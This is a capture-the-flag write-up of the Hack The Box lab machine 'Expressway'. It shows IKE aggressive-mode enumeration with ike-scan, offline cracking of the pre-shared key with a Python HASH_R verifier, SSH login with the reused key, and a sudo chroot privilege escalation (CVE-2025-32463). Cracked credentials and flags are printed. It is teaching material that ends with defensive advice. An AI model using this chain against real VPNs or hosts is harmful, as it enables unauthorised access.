Hackthebox: Expressway

Foued SAIDI

Overview

Expressway is an easy-difficulty Hack The Box machine that starts with an exposed IKE/IPsec VPN service running in aggressive mode. By extracting the pre-shared key hash from the IKE handshake and cracking it offline, we recover credentials that also work for SSH access. Privilege escalation leverages CVE-2025-32463, a local privilege escalation vulnerability in Sudo 1.9.17 that abuses chroot handling to gain a root shell.


Reconnaissance

We begin with a UDP scan since the machine’s open services are not on typical TCP ports:

PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike

Ports 500 (ISAKMP) and 4500 (NAT-T) immediately stand out: both are associated with IPsec/IKE VPN services. The presence of both ports suggests an IPsec VPN endpoint configured for NAT traversal.

IKE Aggressive Mode Enumeration

Using ike-scan, we probe the VPN service in aggressive mode to extract configuration details and identity information:

kujen@kujen:~$ sudo ike-scan -A 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned HDR=(CKY-R=fdeb2dc8fe53175c) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.274 seconds (3.66 hosts/sec). 1 returned handshake; 0 returned notify

The aggressive mode handshake reveals critical information:

  • Encryption: 3DES with SHA1 hashing
  • Authentication: Pre-Shared Key (PSK)
  • DH Group: 2 (modp1024)
  • Identity: ike@expressway.htb (ID_USER_FQDN)
  • XAUTH support is advertised

Aggressive mode is significant because, unlike main mode, it sends the identity and the authentication hash unencrypted, which is what makes offline PSK cracking possible.

PSK Hash Extraction

We run ike-scan again with the -P flag to dump the PSK hash parameters to a file suitable for offline cracking:

kujen@kujen:~$ sudo ike-scan -M -A 10.10.11.87 ike@expressway.htb -P
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=62c8f4fb7d25e949)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
df213e51867ac81d693b62d59116703e30e846b8c1a5b0532b2f454933739c7cd79f0c06b4c3a7e840d9986700bda37dc3c09b2f9f37af31fec735633e72d6364fc6800bf680826a7d70809de054006f7c4bf40932efb7040d12ab3f0da0ae77a823d5b702c1f99fee6457c62290e0b73042ffdfe14abfe8b576398baaeb9407:477b849290209fa6c14a826436e017161b632ad6a5d8c0a00546de88efaf9d0be98255bcc70c537bce30dd40c3e35f85261276b005e35150062124c322e4bbbea63ee46373da3a48c4f048c953fed246de58894fd7d91a2e42c358715671a022fd111ef46e763e404abbdaf3a8c440ab7d331b4ef66292d5f4663a4223fb51fc:62c8f4fb7d25e949:617c7bc6e5c3061c:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:69f6ccb2656cbbd314261ad655faaff3868b1012:b2cd99d9cf4ce0b94439ca02a2e16632922042ccef289786625ec5e97d3ae96d:8e0ee45f952a72ab2562d5a94a9e617e2fedae4e
Ending ike-scan 1.9.5: 1 hosts scanned in 1.997 seconds (0.50 hosts/sec). 1 returned handshake; 0 returned notify

This saves the IKE PSK parameters in the format g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r, which is exactly the input format psk-crack expects.

Cracking the Pre-Shared Key

With the hash file in hand, we use psk-crack with rockyou.txt to recover the PSK:

$ psk-crack -d /usr/share/wordlists/rockyou.txt hash
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 8e0ee45f952a72ab2562d5a94a9e617e2fedae4e
Ending psk-crack: 8045040 iterations in 10.867 seconds (740328.82 iterations/sec)

The PSK is freakingrockstarontheroad.
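To make concrete what psk-crack is actually checking, and why aggressive mode hands this material to any host that can reach port 500/udp, here is an added Python example (not part of the original writeup and not ike-scan code) that recomputes HASH_R per RFC 2409 from the parameter line captured above and compares it with a single candidate key; it also decodes the IDir_b field to show the identity that was sent in the clear.

```python
import hashlib
import hmac

# psk-crack input line recorded by `ike-scan -P` above; fields are
# g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r, all hex-encoded.
PSK_LINE = (
    "df213e51867ac81d693b62d59116703e30e846b8c1a5b0532b2f454933739c7c"
    "d79f0c06b4c3a7e840d9986700bda37dc3c09b2f9f37af31fec735633e72d636"
    "4fc6800bf680826a7d70809de054006f7c4bf40932efb7040d12ab3f0da0ae77"
    "a823d5b702c1f99fee6457c62290e0b73042ffdfe14abfe8b576398baaeb9407:"
    "477b849290209fa6c14a826436e017161b632ad6a5d8c0a00546de88efaf9d0b"
    "e98255bcc70c537bce30dd40c3e35f85261276b005e35150062124c322e4bbbe"
    "a63ee46373da3a48c4f048c953fed246de58894fd7d91a2e42c358715671a022"
    "fd111ef46e763e404abbdaf3a8c440ab7d331b4ef66292d5f4663a4223fb51fc:"
    "62c8f4fb7d25e949:617c7bc6e5c3061c:"
    "00000001000000010000009801010004"
    "030000240101000080010005800200028003000180040002800b0001000c000400007080"
    "030000240201000080010005800200018003000180040002800b0001000c000400007080"
    "030000240301000080010001800200028003000180040002800b0001000c000400007080"
    "000000240401000080010001800200018003000180040002800b0001000c000400007080:"
    "03000000696b6540657870726573737761792e687462:"
    "69f6ccb2656cbbd314261ad655faaff3868b1012:"
    "b2cd99d9cf4ce0b94439ca02a2e16632922042ccef289786625ec5e97d3ae96d:"
    "8e0ee45f952a72ab2562d5a94a9e617e2fedae4e"
)

def parse_psk_line(line: str) -> list[bytes]:
    fields = [bytes.fromhex(f) for f in line.strip().split(":")]
    if len(fields) != 9:
        raise ValueError("expected 9 colon-separated hex fields")
    return fields

def hash_r_matches(line: str, candidate: str) -> bool:
    """RFC 2409 with PSK auth: SKEYID = prf(PSK, Ni_b | Nr_b) and
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).
    prf is HMAC-SHA1 because the responder negotiated Hash=SHA1."""
    g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b, hash_r = parse_psk_line(line)
    skeyid = hmac.new(candidate.encode(), ni_b + nr_b, hashlib.sha1).digest()
    computed = hmac.new(skeyid, g_xr + g_xi + cky_r + cky_i + sai_b + idir_b,
                        hashlib.sha1).digest()
    return hmac.compare_digest(computed, hash_r)

def responder_identity(line: str) -> str:
    """IDir_b layout: ID type (1 byte), protocol (1), port (2), then the identity."""
    idir_b = parse_psk_line(line)[5]
    return idir_b[4:].decode("ascii")
```

The whole check is two HMAC-SHA1 calls with no secret other than the PSK itself, which is why a weak or reused PSK in aggressive mode is equivalent to a plaintext password.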

User Access: SSH

Since the IKE identity was ike@expressway.htb, we try the cracked PSK as the SSH password for user ike:

kujen@kujen:~$ ssh ike@10.10.11.87
The authenticity of host '10.10.11.87 (10.10.11.87)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.87' (ED25519) to the list of known hosts.
ike@10.10.11.87's password:
Last login: Thu Sep 25 04:19:01 BST 2025 from 10.10.14.13 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Sep 25 04:39:45 2025 from 10.10.16.8
ike@expressway:~$ cat user.txt
36dd558a9f8b3b7e02b7ca0b07c333ad
ike@expressway:~$

The password was reused between the VPN PSK and the user's SSH account, a common misconfiguration in real environments.

Privilege Escalation: CVE-2025-32463

Checking the Sudo version on the box:

ike@expressway:~$ sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

Sudo 1.9.17 is vulnerable to CVE-2025-32463, a local privilege escalation vulnerability that exploits how Sudo handles chroot operations. When a sudoers rule allows running a command with CHROOT set, it can be abused to escalate to root by manipulating the chroot environment to load a malicious shared library or binary.

We grab the public exploit script and run it:

ike@expressway:/tmp$ nano exp.sh
ike@expressway:/tmp$ chmod +x exp.sh
ike@expressway:/tmp$ ./exp.sh
woot!
root@expressway:/# cat /root/root.txt
2c7810c1e4b54d08d56ddad65cd73170
root@expressway:/#

Key Takeaways

  • IKE Aggressive Mode exposes identity and PSK hash material to any host that can reach port 500/udp. Always prefer main mode when PSK authentication is required.
  • Credential reuse between a VPN pre-shared key and user SSH passwords is a critical operational security failure.
  • CVE-2025-32463 demonstrates that even Sudo, one of the most audited utilities in Linux, can introduce local privilege escalation paths through chroot handling edge cases. Keep Sudo updated.

That was it for Expressway, hope you learned something new!

-0xkujen

  • Title: Hackthebox: Expressway
  • Author: Foued SAIDI
  • Created at: 2026-03-07 14:29:51
  • Updated at: 2026-03-07 14:36:20
  • Link: https://kujen5.github.io/2026/03/07/Hackthebox-Expressway/
  • License: This work is licensed under CC BY-NC-SA 4.0.